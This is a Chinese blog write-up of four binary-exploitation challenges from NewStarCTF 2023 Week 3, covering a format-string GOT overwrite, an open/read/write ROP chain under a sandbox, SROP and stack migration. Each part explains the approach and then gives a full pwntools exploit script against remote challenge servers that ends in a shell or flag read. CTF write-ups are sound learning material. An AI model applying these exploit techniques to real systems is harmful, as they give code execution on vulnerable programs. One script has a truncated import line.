NewStarCTF 2023 WEEK3|PWN

最新推荐文章于 2024-06-14 09:32:35 发布
最新推荐文章于 2024-06-14 09:32:35 发布
阅读量463 收藏 4
点赞数
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51890658/article/details/133866568
版权

1.puts or system?

2.orw&rop

3.srop

4.stack migration revenge

1.puts or system?

根据名字提示把puts改为system,开了canary,但它没有用

存在格式化字符串漏洞,且有n次

思路:relro保护没开,可修改got表,且给了libc库,通过格式化第一次泄露got,获得system函数,第二次修改puts的got表为system即可get shell

EXP:

from pwn import *
from LibcSearcher import *
from ctypes import *
sh=remote("node4.buuoj.cn",27323)
elf=ELF("./putsorsys")
libc=ELF("libc.so.6")

context.arch="amd64"

un=lambda a:sh.recvuntil(a)
rv=lambda a:sh.recv(a)
rl=lambda:sh.recvline()
sd=lambda a:sh.send(a)
sl=lambda a:sh.sendline(a)
Jz=lambda a:u64(sh.recv(6)+"\x00"*2)-a
inter=lambda :sh.interactive()
U64=lambda a:u64(sh.recv(6)+"\x00"*2)-libc.sym[a]

libcc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")


puts_got=elf.got['puts']

def fun(data):
    un("(0/1)\n")
    sl("1")
    un("it\n")
    sd(data)
    un("gift:\n")


fun("%9$saaaa"+p64(puts_got))
puts=u64(sh.recv(6)+"\x00"*2)
jz=puts-libc.sym['puts']
system=jz+libc.sym['system']

a=(system&0xffff0000)/0x10000
b=system&0xffff
if a>b:
    fun("%"+str(b)+"c%12$hn"+"%"+str(a-b)+"c%13$hnaaaaaa"+p64(puts_got)+p64(puts_got+2))

else:
    fun("%"+str(a)+"c%12$hn"+"%"+str(b-a)+"c%13$hnaaaaaa"+p64(puts_got+2)+p64(puts_got))


inter()

2.orw&rop

通过题目提示使用open read write来构造rop拿shell

看了堆栈不可执行和canary

拖入ida分析,开了沙盒,execve函数不可用

有格式化字符串漏洞和大量栈溢出

通过格式化字符串漏洞来泄露canary和libc基址(给了libc库),泄漏出基址后通过ROPgadget来找pop rdi ,pop rsi  pop rdx的偏移量,通过它们来构造输入,向0x66660000写入shellcode,最后ret到0x66660000即可输出flag

EXP:

from pwn import *
from LibcSearcher import *
from pwnlib import *

sh=remote("node4.buuoj.cn",27410)
#sh=process("./ezorw")
elf=ELF("./ezorw")
libc=ELF("libc.so.6")
 

context.arch="amd64"

un=lambda a:sh.recvuntil(a)
rv=lambda a:sh.recv(a)
rl=lambda:sh.recvline()
sd=lambda a:sh.send(a)
sl=lambda a:sh.sendline(a)
Jz=lambda a:u64(sh.recv(6)+"\x00"*2)-a
inter=lambda :sh.interactive()
U64=lambda a:u64(sh.recv(6)+"\x00"*2)-libc.sym[a]

libcc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

puts_got=elf.got['puts']
read=elf.plt['read']

un("sandbox\n")
sd("%11$p%8$saaaaaaa"+p64(puts_got))
canary=int(sh.recv(18),16)
print hex(canary)

jz=u64(sh.recv(6)+"\x00"*2)-libc.sym['puts']
print hex(jz)

pop_rdi=jz+0x000000000002a3e5
pop_rsi=jz+0x000000000002be51
pop_rdbx=jz+0x0000000000090529

shell=shellcraft.open("flag",0,0)
shell+=shellcraft.read(3,0x66660000+0x500,0x30)
shell+=shellcraft.write(1,0x66660000+0x500,0x30)
ret=0x4013B2
start=0x4012E4

sd("a"*0x28+p64(canary)*2+p64(ret)+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(0x66660000)+p64(pop_rdbx)+p64(0x100)*2+p64(read)+p64(0x66660000))

sd(asm(shell))

inter()

3.srop

根据题目提示要使用srop,存在大量的栈溢出,地址没随机化,有syscall函数

没开canary,通过SigreturnFrame()函数来构造srop,在栈溢出中里返回地址距离为0x38字节

在init函数中找到pop_rdi指令,sigreturn调用号为0xf

把0x40118c作为构造的rip值,有leave(mov rsp,rbp,pop rbp),在sigreturn后可以实现栈迁移,我们把srop构造成syscall(0,0,0x404020,0x200),也就是向data段写入0x200字节数据,在输入完成后通过栈迁移到data段,所以在第一次溢出后(也就是第一次srop)向data输入/bin/sh字符串和再次构造的srop

syscall(59,"/bin/sh",0,0)即可get shell

EXP:

from pwn import *
from LibcSearcher import *
from pwnlib import 
sh=remote("node4.buuoj.cn",26779)
#sh=process("./pwn_1")
elf=ELF("./pwn_1")
libc=ELF("libc.so.6")

context.arch="amd64"

un=lambda a:sh.recvuntil(a)
rv=lambda a:sh.recv(a)
rl=lambda:sh.recvline()
sd=lambda a:sh.send(a)
sl=lambda a:sh.sendline(a)
Jz=lambda a:u64(sh.recv(6)+"\x00"*2)-a
inter=lambda :sh.interactive()
U64=lambda a:u64(sh.recv(6)+"\x00"*2)-libc.sym[a]


syscall=0x401040
buf=0x404020
sys=0x401136
pop_rdi=0x401203
syscall_leave=0x40118C

frame=SigreturnFrame()

frame.rdi=0
frame.rsi=0
frame.rdx=buf
frame.rcx=0x200
frame.rsp=buf-0x10
frame.rbp=buf
frame.rip=syscall_leave

sh.recv()
sd("a"*0x38+p64(pop_rdi)+p64(0xf)+p64(syscall)+str(frame))


frame=SigreturnFrame()
frame.rdi=59
frame.rsi=buf
frame.rdx=0
frame.rcx=0
frame.rsp=buf
frame.rip=syscall
sd("/bin/sh\x00"+p64(pop_rdi)+p64(0xf)+p64(syscall)+str(frame))


inter()

注意:

1.在溢出srop时不能使用call syscall,因为它要push返回地址

2.使用open,read,write当然也可以,因为它没有开沙盒,但是要复杂一点

EXP:

from pwn import *
from LibcSearcher import *
sh=remote("node4.buuoj.cn",26779)
elf=ELF("./pwn_1")

context.arch="amd64"

un=lambda a:sh.recvuntil(a)
rv=lambda a:sh.recv(a)
rl=lambda:sh.recvline()
sd=lambda a:sh.send(a)
sl=lambda a:sh.sendline(a)
Jz=lambda a:u64(sh.recv(6)+"\x00"*2)-a
inter=lambda :sh.interactive()
U64=lambda a:u64(sh.recv(6)+"\x00"*2)-libc.sym[a]


syscall=0x401040
buf=0x404020
sys=0x401136
pop_rdi=0x401203


frame=SigreturnFrame()

frame.rdi=0
frame.rsi=0
frame.rdx=buf
frame.rcx=0x600
frame.rsp=buf
frame.rip=syscall

sh.recv()
sd("a"*0x38+p64(pop_rdi)+p64(0xf)+p64(syscall)+str(frame))


flag=buf+0x500
frame_open=SigreturnFrame()
frame_open.rdi=2
frame_open.rsi=flag
frame_open.rdx=0
frame_open.rcx=0
frame_open.rsp=buf+0x150
frame_open.rip=syscall
paly=p64(pop_rdi)+p64(0xf)+p64(syscall)+str(frame_open)
paly=paly.ljust(0x150,"\x00")

frame_read=SigreturnFrame()
frame_read.rdi=0
frame_read.rsi=3
frame_read.rdx=buf+0x600
frame_read.rcx=0x30
frame_read.rsp=buf+0x300
frame_read.rip=syscall


paly+=p64(pop_rdi)+p64(0xf)+p64(syscall)+str(frame_read)
paly=paly.ljust(0x300,"\x00")


frame_write=SigreturnFrame()
frame_write.rdi=1
frame_write.rsi=1
frame_write.rdx=buf+0x600
frame_write.rcx=0x30
frame_write.rsp=buf+0x450
frame_write.rip=syscall

paly+=p64(pop_rdi)+p64(0xf)+p64(syscall)+str(frame_write)
paly=paly.ljust(0x500,"\x00")
paly+="flag\x00"

sd(paly)

inter()

4.stack migration revenge

没开canary,拖入ida分析

结构很简单,看出能控制rbp和rip来栈迁移,但没有给栈地址,这时就要动脑了

还好没开pie,地址没随机化,可以使用bss来栈迁移,通过题目名字的提示(卷土重来)联想到

第一次修改rbp到bss段中,然后返回到0x4011ff即可向bss中写入

注意的是lea rax,[rbp+buf],buf为-0x50,会在低0x50地址开始写入,所以我们把rbp改为bss+0x50

此时就是向bss写入,在bss+0x50这个位置写入bss-8(有个pop rbp)和返回地址写入leave_ret,最后就能把rsp迁移到bss段,在bss段写入rop来泄露libc基址(给了libc库)和通过pop_rbp_ret来继续控制rbp(通过ROPgadget来查找),这次bss段地址要高,因为system入栈的参数很多,如果不提高栈地址很有可能覆盖到got表或其他重要的数据导致程序直接报错

最后和前面一样,把最后16字节rbp和返回地址修改为第二次bss-8和leave_ret即可get shell

EXP:

from pwn import *
from LibcSearcher import *
from pwnlib import *
from ctypes import *
sh=remote("node4.buuoj.cn",25179)
#sh=process("./stack")
elf=ELF("./stack")
libc=ELF("libc.so.6")

context.arch="amd64"

un=lambda a:sh.recvuntil(a)
rv=lambda a:sh.recv(a)
rl=lambda:sh.recvline()
sd=lambda a:sh.send(a)
sl=lambda a:sh.sendline(a)
Jz=lambda a:u64(sh.recv(6)+"\x00"*2)-a
inter=lambda :sh.interactive()
U64=lambda a:u64(sh.recv(6)+"\x00"*2)-libc.sym[a]

libcc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")


pop_rdi=0x4012B3
ret=0x40124B
puts=elf.plt['puts']
puts_got=elf.got['puts']
leave=0x401227 #4011FF
bss=0x404100
un("me:")
pop_rbp=0x000000000040115d


sd("a"*0x50+p64(bss+0x50)+p64(0x4011ff))

un("funny\n")
shell=p64(pop_rdi)+p64(puts_got)+p64(puts)
shell+=p64(pop_rbp)+p64(bss+0x800)+p64(0x4011ff)
shell=shell.ljust(0x50,"\x00")
shell+=p64(bss-8)+p64(leave)

sd(shell)
un("funny\n")

jz=u64(sh.recv(6)+"\x00"*2)-libc.sym['puts']
print hex(jz)
system=jz+libc.sym['system']
bin_sh=jz+libc.search("/bin/sh").next()

shell=p64(pop_rdi)+p64(bin_sh)+p64(system)
shell=shell.ljust(0x50,"\x00")
shell+=p64(bss+0x800-0x58)+p64(leave)

sd(shell)


inter()

Binary..
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
NewStarCTF2023week3-Rabin‘s RSA
Welcome To Myon'Blog !
10-18 712
使用Rabin算法直接计算明文,再将明文转字符串即可。运行得到 flag{r4b1n#4c58}根据题目提示是Rabin算法。我们也可以通过脚本来理解原理。导入e,n,p,q,c。先将N分解得到P和Q。
[wp]NewStarCTF 2023 WEEK3|WEB
m0_63138919的博客
10-21 2616
本文为NewStarCTF 2023 WEEK3|WEB部分题解内容 只记录自己学习的过程,各位师傅可参考指出问题
2023 NewStarCTF --- wp
3tefanie丶zhou的博客
10-09 3294
【活着得,怎么就轻松惬意了,无需愧疚。】
NewStarCTF2023week4-逃(反序列化字符串逃逸)
Welcome To Myon'Blog !
10-24 790
在反序列化的时候php会根据s所指定的字符长度去读取后边的字符,由于在序列化操作后又使用了str_replace()函数进行字符串替换,这就可能会改变字符串的长度,比如上面将bad替换为good,每替换掉一个bad,字符串长度明显就增加了1,而由于序列化之后s的值没变,但是进行了内容替换,改变了字符串长度,那么反序列化读取时,就并不能将原本的内容读取完全。得到:O:7:"GetFlag":2:{s:3:"key";而后面没有被读到的内容,也就是逃逸出来的字符串,就会被当做当前类的属性被继续执行。
2023NewStarCTF-PWN-week1 WP(纯萌新视角解题思考过程,含题目可放心食用
2301_79283256的博客
10-03 404
因为程序实行分页管理机制,所以在一页内地址之间的偏移量不会变,且一页的长度为0x1000,这也就意味着任何一条指令地址的低三位数值(十六进制下)都不会变,也就是地址的低1.5字节不变。在ret2text中解决栈平衡的方案有很多种(比如加ret地址,加retn地址,加lea地址等),但此处因为溢出字节有限只能直接跳转到lea解决。地址随机化,但是程序中各个节的相对位置不变,也就是说如果你能得到运行中程序的任何一个可辨识地方的地址,就可以通过该地址与目标的偏移来获取目标的真实地址。但是前提是得想办法泄露地址。
Python库 | pwn-machine-1.1.tar.gz
03-11
python库。 资源全名:pwn-machine-1.1.tar.gz
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
welpwn pwn 入门题
02-11
pwn 入门题
NewStarCTF 2023 [WEEK 3] PWN
Xzzzz911的博客
10-28 724
这次题目确实上了一个档次,有些东西确实也不怎么好理解,慢慢来,积少成多,相同题型放一起总结,总会得出好的结论,就一句话:多做多总结,冲冲冲!!!
NewStarCTF 2023 [WEEK 2] PWN
Xzzzz911的博客
10-15 1116
第二周题目上难度了,有几题做的比较棘手不会做>_
NewstarCTF2023 WEB [WEEK3] 题目及思路
2301_76690905的博客
10-23 1149
提示了LFI to RCE,搜相关资料可知然后使用蚁剑链接。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8287
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
数字时代网络安全即服务的兴起
网络研究观
06-11 570
网络安全即服务是一种通过基于云的服务来管理安全需求的综合方法。
等保测评和安全运维
weixin_64392888的博客
06-11 606
通过将等保测评的标准和流程融入日常的安全运维工作中,企业可以更有效地识别和应对网络安全威胁,构建起一个全面、动态的网络安全防护体系。为了应对这些挑战,企业不仅要实施有效的安全运维措施,还需要通过等保测评确保其信息系统符合国家的安全标准。等保测评提供了一套标准化的安全要求,安全运维团队可以根据这些要求,实施相应的安全措施,如加强访问控制、数据加密、网络安全防护等。通过等保测评,企业可以识别信息系统的安全风险,并根据测评结果制定或调整安全策略,确保安全措施与企业的实际需求相匹配。
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1271
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 211
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
NewStarCTF2023week3
10-20
NewStarCTF2023week3是一场CTF比赛,其中包含了各种类型的题目,例如Web、Crypto、Pwn等等。其中,引用和引用是该比赛中的两道题目的flag,而引用则是一篇关于该比赛中Crypto题目chaos的Writeup。如果你对CTF比赛感兴趣,可以尝试参加一些类似的比赛,提高自己的技能和思维能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值